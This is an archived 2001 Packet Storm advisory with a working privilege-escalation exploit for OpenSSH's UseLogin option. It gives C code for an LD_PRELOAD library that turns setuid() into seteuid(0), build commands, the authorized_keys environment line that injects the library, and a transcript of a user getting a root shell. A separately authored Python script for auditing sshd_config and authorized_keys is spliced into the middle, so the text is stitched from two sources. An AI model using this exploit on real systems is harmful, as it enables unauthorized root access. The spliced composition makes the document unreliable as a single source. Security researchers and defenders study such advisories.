UseLogin.txt

2001-12-09T00:00:00
ID PACKETSTORM:25515
Type packetstorm
Reporter War
Modified 2001-12-09T00:00:00

Description

--[ OpenSSH UseLogin bug proof of concept exploit ]--  
by [WaR] <war@genhex.org> / http://www.genhex.org  
  
  
--[ Intro ]--  
  
I was very curious in finding out how to exploit this problem. Although  
I don't think anyone uses this feature, I looked into the matter anyway.  
Here it goes. It was tested on the following platforms:  
- Slackware 7.1 with OpenSSH3.0p1  
- RedHat 7.1 with OpenSSH_2.9p2  
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)  
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)  
The exploit should work as long as UseLogin does. YMMV.  
  
This is based on libroot from squidge@onyx.infonexus.com,  
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and  
you thought it wouldn't happen again...).   
  
Kudos to pmsac@toxyn.org for his help figuring out the problem with   
the Slackware UseLogin, testing on OpenBSD, and giving the idea for  
the seteuid(0) (it originally was a system("/bin/sh");).  
  
  
--[ Code ]--   
  
Create a lib.c file with the following content:  
  
---8<---  
#include <stdio.h>  
#include <sys/types.h>  
#include <unistd.h>      /* declares seteuid() and the uid_t prototype of setuid() */  
  
/* Replacement for libc's setuid(): preloaded into login via LD_PRELOAD, */  
/* so login's own setuid() call lands here instead.                      */  
int setuid(uid_t uid){  
  printf("setuid() called...\n");  
  seteuid(0);  
  return 0;  
}  
---8<---  
  
Compile it into a library:  
gcc -c -o lib.o lib.c  
ld -shared -o libroot.so lib.o  
chmod 755 ./libroot.so  
  
  
Now, for the tricky (*g*) part...  
  
You must have an account on the machine, and create an entry  
in $HOME/.ssh/authorized_keys (or authorized_keys2) with:  
  
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>  
  
When sshd receives your connection, it exports this variable  
into the environment *BEFORE* running login. Somewhere after this,  
login calls setuid(). Because libroot.so is preloaded, that call  
lands in the replacement above, which does a seteuid(0).  
  
$ id  
uid=1000(war) gid=100(users) groups=100(users)  
$ ssh war@localhost  
Enter passphrase for key '/home/war/.ssh/id_dsa':  
sh-2.04# id  
uid=0(root) gid=100(users) groups=100(users)  
  
  
It also works remotely. Anyway, you _MUST_ have an account on  
the victim machine so you can set up the environment, and log in.  
And obviously (duh) it must have UseLogin enabled.  
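As an added defender-side example (not part of the advisory, and not OpenSSH's own tooling), here is a small Python audit for the two preconditions above: it reads an sshd_config for the UseLogin setting and scans authorized_keys lines for environment="..." options, rating loader variables such as LD_PRELOAD as high. Both inputs are constructed samples embedded inline; the file contents, the placeholder key material and the path /home/war/libroot.so are assumptions made for the example, not data from any real host.

```python
import re

# Constructed sample sshd_config (not taken from any real host). "UseLogin yes" is the
# setting the advisory relies on; the second UseLogin line shows that sshd keeps the
# first value it sees for a keyword.
SAMPLE_SSHD_CONFIG = """\
# constructed sample
Port 22
UseLogin yes
UseLogin no
"""

# Constructed authorized_keys lines; the key material is a placeholder, not a real key.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample
ssh-dss AAAAB3placeholder== war@example
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAB3placeholder== war@example
environment="TZ=UTC",no-pty ssh-rsa AAAAB3placeholder== ops@example
"""

CONFIG_LINE = re.compile(r"^\s*(\w+)\s*=?\s*(.*?)\s*$")   # "Keyword value" or "Keyword=value"
ENV_OPTION = re.compile(r'environment="([^"]*)"')
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-")
# Loader variables that, once inherited by a program sshd starts as root (login(1)
# under UseLogin), make that program load user-controlled code.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}


def parse_sshd_config(text):
    """Effective keyword values with lower-cased keys; first occurrence wins, as in sshd.
    Match blocks are not modelled (assumption: the file has none)."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CONFIG_LINE.match(line)
        if not m or not m.group(2):
            continue
        settings.setdefault(m.group(1).lower(), m.group(2))
    return settings


def split_outside_quotes(line):
    """Split on whitespace that is not inside double quotes (the options field may
    contain quoted values with spaces, e.g. command="...")."""
    tokens, buf, quoted = [], [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
            buf.append(ch)
        elif ch.isspace() and not quoted:
            if buf:
                tokens.append("".join(buf))
                buf = []
        else:
            buf.append(ch)
    if buf:
        tokens.append("".join(buf))
    return tokens


def find_environment_options(text):
    """Return (line number, variable, value) for every environment= option found in
    the options field of an authorized_keys line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        tokens = split_outside_quotes(line)
        if not tokens or tokens[0].startswith("#"):
            continue
        # A line that starts with a key type (or an ssh1 bit count) has no options field.
        if tokens[0].startswith(KEY_TYPES) or tokens[0].isdigit():
            continue
        for env in ENV_OPTION.findall(tokens[0]):
            name, _, value = env.partition("=")
            findings.append((lineno, name, value))
    return findings


def audit(sshd_config, authorized_keys):
    """Return ("exposed"|"ok", findings): exposed means UseLogin is on AND some key
    injects a loader variable, which is exactly the pair of preconditions above."""
    settings = parse_sshd_config(sshd_config)
    use_login = settings.get("uselogin", "no").lower() == "yes"
    env_opts = find_environment_options(authorized_keys)
    findings = []
    if use_login:
        findings.append("sshd_config: UseLogin yes (login runs with the user-supplied environment)")
    for lineno, name, value in env_opts:
        level = "HIGH" if name in LOADER_VARS else "INFO"
        findings.append(f"authorized_keys:{lineno}: environment {name}={value} [{level}]")
    loader_injected = any(name in LOADER_VARS for _, name, _ in env_opts)
    return ("exposed" if use_login and loader_injected else "ok"), findings


if __name__ == "__main__":
    verdict, report = audit(SAMPLE_SSHD_CONFIG, SAMPLE_AUTHORIZED_KEYS)
    print("verdict:", verdict)
    for item in report:
        print(" ", item)
```

The fix on the sshd side is "UseLogin no" (the default), after which login is never started and the preloaded library has nothing to hook; later OpenSSH releases additionally added a PermitUserEnvironment keyword, off by default, that makes sshd ignore environment= options altogether. Pointing the audit at real files means reading /etc/ssh/sshd_config and every user's ~/.ssh/authorized_keys and authorized_keys2 in place of the constructed samples.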
  
That's all.  
  
  
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.   
  
  
-- [WaR]  
"If you can't hack it, hit it with a hammer"  